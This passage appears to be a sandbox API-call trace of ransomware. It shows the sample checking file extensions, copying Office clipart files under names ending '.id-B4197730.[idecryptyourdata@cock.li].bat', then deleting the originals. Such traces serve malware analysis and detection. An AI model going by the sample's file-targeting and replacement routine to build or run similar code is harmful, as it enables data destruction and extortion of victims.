(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.666] lstrlenW (lpString=".1cd") returned 4 [0184.666] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.667] lstrlenW (lpString=".jpg") returned 4 [0184.667] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.667] lstrlenW (lpString=".doc") returned 4 [0184.667] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.667] lstrlenW (lpString=".docx") returned 5 [0184.667] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.667] lstrlenW (lpString=".pdf") returned 4 [0184.667] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.667] lstrlenW (lpString=".xls") returned 4 [0184.667] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.667] lstrlenW (lpString=".xlsx") returned 5 [0184.667] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.667] lstrlenW (lpString=".ppt") returned 4 [0184.667] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.667] lstrlenW (lpString=".zip") returned 4 [0184.667] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.667] lstrlenW (lpString=".rar") returned 4 [0184.667] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.667] lstrlenW (lpString=".bz2") returned 4 [0184.667] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.667] lstrlenW (lpString=".7z") returned 3 [0184.667] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.667] lstrlenW (lpString=".dbf") returned 4 [0184.667] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.668] lstrlenW (lpString=".1cd") returned 4 [0184.668] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.668] lstrlenW (lpString=".jpg") returned 4 [0184.668] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.668] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.668] lstrlenW (lpString="J0107528.WMF") returned 12 [0184.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.669] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=6792) returned 1 [0184.669] CloseHandle (hObject=0x334) returned 1 [0184.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf")) returned 0x220 [0184.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.669] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.669] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0184.670] GetLastError () returned 0x0 [0184.670] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1a88, lpOverlapped=0x0) returned 1 [0184.672] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1a90, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1a90, lpOverlapped=0x0) returned 1 [0184.673] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.673] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.673] SetEndOfFile (hFile=0x380) returned 1 [0184.674] CloseHandle (hObject=0x380) returned 1 [0184.674] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.674] SetEndOfFile (hFile=0x334) returned 1 [0184.675] CloseHandle (hObject=0x334) returned 1 [0184.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.675] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf")) returned 1 [0184.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.675] lstrlenW (lpString=".doc") returned 4 [0184.675] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.676] lstrlenW (lpString=".docx") returned 5 [0184.676] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.676] lstrlenW (lpString=".pdf") returned 4 [0184.676] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.676] lstrlenW (lpString=".xls") returned 4 [0184.676] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.676] lstrlenW (lpString=".xlsx") returned 5 [0184.676] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.676] lstrlenW (lpString=".ppt") returned 4 [0184.676] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.676] lstrlenW (lpString=".zip") returned 4 [0184.676] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.676] lstrlenW (lpString=".rar") returned 4 [0184.676] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.676] lstrlenW (lpString=".bz2") returned 4 [0184.676] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.676] lstrlenW (lpString=".7z") returned 3 [0184.676] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.676] lstrlenW (lpString=".dbf") returned 4 [0184.676] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.676] lstrlenW (lpString=".1cd") returned 4 [0184.676] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.676] lstrlenW (lpString=".jpg") returned 4 [0184.676] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.677] lstrlenW (lpString=".doc") returned 4 [0184.677] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.677] lstrlenW (lpString=".docx") returned 5 [0184.677] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.677] lstrlenW (lpString=".pdf") returned 4 [0184.677] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.677] lstrlenW (lpString=".xls") returned 4 [0184.677] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.677] lstrlenW (lpString=".xlsx") returned 5 [0184.677] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.677] lstrlenW (lpString=".ppt") returned 4 [0184.677] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.677] lstrlenW (lpString=".zip") returned 4 [0184.677] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.677] lstrlenW (lpString=".rar") returned 4 [0184.677] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.677] lstrlenW (lpString=".bz2") returned 4 [0184.677] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.677] lstrlenW (lpString=".7z") returned 3 [0184.677] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.677] lstrlenW (lpString=".dbf") returned 4 [0184.677] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.677] lstrlenW (lpString=".1cd") returned 4 [0184.678] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 68 [0184.678] lstrlenW (lpString=".jpg") returned 4 [0184.678] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.678] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.678] lstrlenW (lpString="J0107544.WMF") returned 12 [0184.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.679] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=26768) returned 1 [0184.679] CloseHandle (hObject=0x334) returned 1 [0184.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf")) returned 0x220 [0184.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.679] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.679] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0184.680] GetLastError () returned 0x0 [0184.680] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x6890, lpOverlapped=0x0) returned 1 [0185.070] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x68a0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x68a0, lpOverlapped=0x0) returned 1 [0185.072] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.072] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.072] SetEndOfFile (hFile=0x380) returned 1 [0185.073] CloseHandle (hObject=0x380) returned 1 [0185.073] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.073] SetEndOfFile (hFile=0x334) returned 1 [0185.074] CloseHandle (hObject=0x334) returned 1 [0185.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf")) returned 1 [0185.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.075] lstrlenW (lpString=".doc") returned 4 [0185.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.075] lstrlenW (lpString=".docx") returned 5 [0185.075] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0185.075] lstrlenW (lpString=".pdf") returned 4 [0185.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.075] lstrlenW (lpString=".xls") returned 4 [0185.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.075] lstrlenW (lpString=".xlsx") returned 5 [0185.075] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0185.075] lstrlenW (lpString=".ppt") returned 4 [0185.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.075] lstrlenW (lpString=".zip") returned 4 [0185.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.075] lstrlenW (lpString=".rar") returned 4 [0185.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.075] lstrlenW (lpString=".bz2") returned 4 [0185.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.075] lstrlenW (lpString=".7z") returned 3 [0185.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.075] lstrlenW (lpString=".dbf") returned 4 [0185.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.075] lstrlenW (lpString=".1cd") returned 4 [0185.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.076] lstrlenW (lpString=".jpg") returned 4 [0185.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.076] lstrlenW (lpString=".doc") returned 4 [0185.076] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.076] lstrlenW (lpString=".docx") returned 5 [0185.076] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0185.076] lstrlenW (lpString=".pdf") returned 4 [0185.076] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.076] lstrlenW (lpString=".xls") returned 4 [0185.076] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.076] lstrlenW (lpString=".xlsx") returned 5 [0185.076] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0185.076] lstrlenW (lpString=".ppt") returned 4 [0185.076] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.076] lstrlenW (lpString=".zip") returned 4 [0185.076] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.076] lstrlenW (lpString=".rar") returned 4 [0185.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.076] lstrlenW (lpString=".bz2") returned 4 [0185.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.076] lstrlenW (lpString=".7z") returned 3 [0185.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.076] lstrlenW (lpString=".dbf") returned 4 [0185.077] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.077] lstrlenW (lpString=".1cd") returned 4 [0185.077] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 68 [0185.077] lstrlenW (lpString=".jpg") returned 4 [0185.077] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.077] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0185.077] lstrlenW (lpString="J0107750.WMF") returned 12 [0185.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0185.078] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=4716) returned 1 [0185.078] CloseHandle (hObject=0x334) returned 1 [0185.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf")) returned 0x220 [0185.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0185.078] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.078] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0185.079] GetLastError () returned 0x0 [0185.079] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x126c, lpOverlapped=0x0) returned 1 [0185.081] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1270, lpOverlapped=0x0) returned 1 [0185.082] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.082] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.082] SetEndOfFile (hFile=0x380) returned 1 [0185.082] CloseHandle (hObject=0x380) returned 1 [0185.083] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.083] SetEndOfFile (hFile=0x334) returned 1 [0185.084] CloseHandle (hObject=0x334) returned 1 [0185.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.084] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf")) returned 1 [0185.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.084] lstrlenW (lpString=".doc") returned 4 [0185.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.084] lstrlenW (lpString=".docx") returned 5 [0185.084] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0185.084] lstrlenW (lpString=".pdf") returned 4 [0185.085] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.085] lstrlenW (lpString=".xls") returned 4 [0185.085] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.085] lstrlenW (lpString=".xlsx") returned 5 [0185.085] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0185.085] lstrlenW (lpString=".ppt") returned 4 [0185.085] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.085] lstrlenW (lpString=".zip") returned 4 [0185.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.085] lstrlenW (lpString=".rar") returned 4 [0185.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.085] lstrlenW (lpString=".bz2") returned 4 [0185.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.085] lstrlenW (lpString=".7z") returned 3 [0185.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.085] lstrlenW (lpString=".dbf") returned 4 [0185.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.085] lstrlenW (lpString=".1cd") returned 4 [0185.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.085] lstrlenW (lpString=".jpg") returned 4 [0185.085] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 68 [0185.085] lstrlenW (lpString="C:\\Program 